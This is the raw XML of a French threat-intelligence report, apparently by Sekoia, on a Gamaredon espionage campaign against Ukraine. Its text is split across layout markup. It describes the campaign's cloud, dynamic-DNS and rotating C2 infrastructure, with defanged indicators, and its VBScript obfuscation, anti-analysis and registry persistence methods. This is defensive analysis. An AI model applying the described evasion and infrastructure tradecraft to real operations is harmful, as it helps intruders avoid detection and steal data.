            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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l’infrastructure de télécommunications russe dans le sud et l’est de l’Ukraine occupés, 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0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2275863</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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compris en Crimée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30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. Cette localisation correspond à celle d’une base opérationnelle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1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2449218</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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soupçonnée d’appartenir à Gamaredon : en novembre 2021, le Service de sécurité ukrainien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2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2622573</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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(SBU) avait publiquement identifié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cinq membres du groupe comme étant des officiers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3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2795928</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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branche criméenne du FSB, qui opéraient, selon les estimations, depuis Sébastopol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4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2969283</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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agissaient sur ordre du Centre 18 du FSB à Moscou. Bien qu’un lien de causalité direct reste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5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3142638</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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à confirmer, les dommages physiques causés à ces installations électriques et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6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3315993</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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communication ont pu perturber temporairement l’infrastructure réseau locale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32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dont dépend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3489348</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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le groupe. Cette perturbation semble avoir été de courte durée, puisque l’activité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8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3662703</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3963642" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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636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automatisée a repris peu après cette interruption d’une journée.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9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3937658</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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 cours de cette période d’observation d’un mois, 115 adresses IP uniques ont été extraites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0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4111013</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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par Sekoia, quatre domaines et cinq ensembles distincts d’identifiants S3 (nom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1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4284368</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="27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compartiment, clé d’accès et clé secrète), tous liés à un seul fournisseur : Tebi.io. Il convient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2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4457723</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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de noter que Tebi.io devrait cesser ses activités fin mars 2026, un détail qui aurait été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3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4631078</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4900279" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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027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communiqué aux utilisateurs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33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par e-mail plutôt que par une annonce publique.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4656" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1180464</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6518930</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5237602" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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760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21 – Mesage adressé personnellement aux utilisateurs de Tebi.io lors de la cessation d’activités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5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6771663</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Étant donné que la chaîne d’infection semble être active depuis fin décembre 2025, le choix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6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6945018</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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de ce fournisseur suggère une décision opérationnelle délibérée plutôt qu’un simple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7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7118373</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="959812" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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981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opportunisme.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8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7393328</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Enfin, il convient également de noter que Rentry[.]co intègre une fonctionnalité de comptage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9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7563750</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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des vues. Par exemple, l’URL </w:t>
                        </w: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hxxps://rentry[.]co/hwzrmfkx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, consultée le 23 janvier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0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7746388</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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2026, affichait plus de 2 890 vues. Bien que la documentation de Rentry ne fournisse pas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1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7919743</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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détails spécifiques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34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se contentant d’indiquer que les vues sont « mises à jour toutes les 10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2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8093098</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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minutes », il est fort probable que cet indicateur corresponde à un nombre brut de vues,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3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8266453</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3396320" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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63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s’incrémente même lors des actualisations de la page.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4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8743337</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4492281" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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228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29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https://militarnyi.com/en/news/unmanned-systems-forces-data-center-airbase/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5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8889387</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4534826" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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3482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30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https://euvsdisinfo.eu/russias-information-grip-on-ukraines-occupied-territories/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6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9035437</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5621946" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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194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31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https://ssu.gov.ua/en/novyny/sbu-vstanovyla-khakeriv-fsb-yaki-zdiisnyly-ponad-5-tys-kiberatak-na-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7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9181487</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1467797" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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7797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derzhavni-orhany-ukrainy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8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9327537</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4845341" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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534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32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https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/Gamaredon_activity.pdf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0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3822356" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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235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33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https://judis.id/cloud/tebi-io-shutdown-2026-migrasi-cloud-storage/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1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1295310" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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531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34</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle20"/>
                            <w:spacing w:val="-5"/>
                            <w:u w:val="single"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> https://rentry.co/what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206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308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411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513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61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9582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9581524</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1828800" cy="6349"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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923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025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1280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955700</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2253304" cy="189848"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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3304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4.5.2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DDNS et service cloud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2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1268118</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Une partie de l’infrastructure repose sur les services de DNS dynamique (DDNS) fournis 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3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1441473</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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No-IP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35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. Des domaines tels que serveirc[.]com, webhop[.]me, serveftp[.]com et myvnc[.]com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4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1614828</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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sont principalement observés lors de la phase d’accès initiale, une seule occurrence ayant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5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1788183</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3047476" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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74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été relevée au sein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de première étape.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6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2063138</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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De plus, Gamaredon utilise Supabase pour héberger ses charges utiles, tirant parti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7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2236493</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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bonne réputation de la plateforme pour contourner les filtres de sécurité de base. En tant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8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2409848</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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fournisseur légitime de services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backend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en tant que service (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Backend-as-a-Service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9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2583203</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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Supabase offre une infrastructure attrayante pour une utilisation opérationnelle à court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0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2756558</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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terme. Dans le cadre de cette campagne, le service est utilisé pour héberger un fichier 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1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2929913</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2945648" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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56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factice contenant du code VBScript malveillant.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2544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3199790</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3555005" cy="189848"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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55005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4.5.3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Infrastructure contrôlée par l’opérateur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3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3512208</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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Tout au long de la chaîne d’infection, l’opérateur exploite sa propre infrastructure, composée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4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3685563</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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d’adresses IP et de domaines dédiés. La fonction principale de cette infrastructure est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5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3858918</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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recevoir les empreintes des victimes transmises via les en-têtes HTTP. En fonction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6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4032273</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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l’étape spécifique de la chaîne d’infection, ces serveurs sont également configurés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7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4205628</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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délivrer des charges utiles VBScript, fournir des URL de configuration réseau mises à jour ou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8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4378983</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5623976" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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39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servir de point de terminaison d’exfiltration pour les documents collectés par GammaSteel.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9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4653938</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Par exemple, Sekoia a cartographié le déploiement de nouveaux hôtes entre le 16 janvier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0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4827293</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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28 janvier 2026. Au cours de cette période, 55 nouveaux serveurs ont été provisionnés.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1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5000648</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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durée de vie opérationnelle moyenne de ces hôtes est d’environ 24 heures, à l’exception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2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5174003</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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deux adresses IP qui sont restées actives pendant la quasi-totalité de la période et qui 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3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5347358</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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semblent pas se comporter différemment des autres. Cette rotation à haute fréquence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4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5520713</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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démontre que Gamaredon dispose d’une infrastructure distribuée résiliente et de la capacité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5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5694068</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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à provisionner rapidement de nouveaux hôtes. Le schéma de déploiement, qui génère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6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5867423</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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généralement entre trois et huit nouveaux serveurs toutes les 48 heures, suggère fortement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7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6040778</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3902174" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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021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automatisation et une volonté de pérennité opérationnelle.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8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6315733</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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Afin de comparer l’infrastructure activement provisionnée par l’opérateur aux serveurs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9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6489088</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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explicitement affectés à la chaîne d’infection, Sekoia a analysé le volume quotidien d’hôtes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0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6662443</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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uniques distribués via le compte Mastodon mentionné précédemment au cours de la même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2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6835798</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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période. Ces serveurs sont destinés à être utilisés par GammaSteel comme points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3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7009153</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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contrôle C2 ou points de terminaison d’exfiltration. Au total, 61 nouveaux serveurs ont été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4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7182508</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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créés. Cela correspond à un rythme de déploiement constant de quatre nouveaux serveurs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5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7355863</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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par jour, ce qui renforce l'évaluation précédente selon laquelle le pipeline d’infrastructure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6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7529218</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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l’opérateur est automatisé. Par conséquent, Sekoia estime que les serveurs nouvellement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7702573</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4700419" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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041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déployés sont immédiatement mis en service et intégrés à cette campagne.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8144" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1254124</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7972450</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4977963" cy="189848"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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7963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0"/>
                          </w:rPr>
                          <w:t xml:space="preserve">4.5.4 </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle43"/>
                            <w:spacing w:val="-1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Obfuscation, anti-analyse et persistance « made in FSB »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9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8284868</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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Les opérations de Gamaredon se caractérisent par un effort à l’échelle industrielle visant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0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8458223</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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échapper à la détection et à maintenir un accès à long terme. Le volume de bruit généré tant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1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8631578</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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au sein du code du système local que dans les déploiements réseau témoigne d’une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2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8804933</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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compréhension avancée des mécanismes de défense. Cette chaîne d’infection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3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8978288</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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explicitement conçue pour l’anti-analyse, épuisant les défenseurs par sa complexité et ses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4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9151643</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5276517" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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65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techniques d’évasion plutôt que de s’appuyer sur des exploits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zero-day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sophistiqués.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5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1358810" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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881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35</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle20"/>
                            <w:spacing w:val="-5"/>
                            <w:u w:val="single"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> https://www.noip.com/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63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736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838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940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04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01452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8447414</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="979169"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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979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979169"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979169"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="97916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  <a:moveTo>
                            <a:pt x="0" y="160019"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="160019"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="979169"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="979169"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="16001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0019"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="16001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067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9581524</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1828800" cy="6349"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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2720" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3171824</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5184149</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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4768" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1990725</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5184149</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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6816" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5065395</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5572769</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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8864" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3230245</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5572769</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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988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091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1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2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Une caractéristique déterminante de cette campagne est son recours massif à VBScript.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2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2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l’exception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stealer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écrit en Powershell, GammaPhish, GammaWorm et GammaLoad sont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3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5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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codés en VBScript à l’aide de l’API COM native de Windows. Le flux d’exécution fonctionne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5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1480843</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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un peu comme une poupée matriochka russe. Lorsqu’un stockage local s’avère nécessaire,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6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1654198</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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l’opérateur injecte des fonctions VBScript dans des fichiers ADS associés à des profils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7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1827553</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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utilisateur standard ou à des répertoires temporaires. Il existe actuellement très peu d’outils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8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2000908</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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d’analyse courants dédiés à l’exécution de VBScript, et Sekoia estime que Gamaredon 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9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2174263</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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délibérément développé cette chaîne d’infection en VBScript afin de tromper les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sandbox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0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2347618</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2425964" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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596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ralentir la rétro-ingénierie manuelle.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1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2622573</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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Pour compliquer encore davantage le triage, Gamaredon recourt à des techniques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2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2795928</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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d’obfuscation en concevant chaque composant de manière à ce qu’il se fonde dans le bruit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3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2969283</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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de fond d’un environnement Windows standard. Chaque fonction que Sekoia a analysé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4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3142638</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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présente des variantes constantes par rapport aux enquêtes en ligne précédentes ;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5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3315993</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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variables changent, les structures logiques sont légèrement décalées et le bruit codé en dur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6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3489348</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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est aléatoire, ce qui rend difficile le suivi de l’évolution de la chaîne. Les charges utiles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7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3662703</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="28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VBScript en mémoire dépassent souvent les 20 000 lignes, fortement gonflées par du code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8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3836058</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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indésirable généré dynamiquement et de fausses variables afin de contourner les signatures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9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4009413</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2892562" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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25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statiques et de perturber l’analyse dynamique.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0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4284368</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Au-delà de l’obfuscation des scripts, Gamaredon a transformé le registre Windows en arme.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1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4457723</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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GammaLoad met à jour et lit en permanence le registre pour y stocker les configurations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2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4631078</wp:posOffset>
            </wp:positionV>
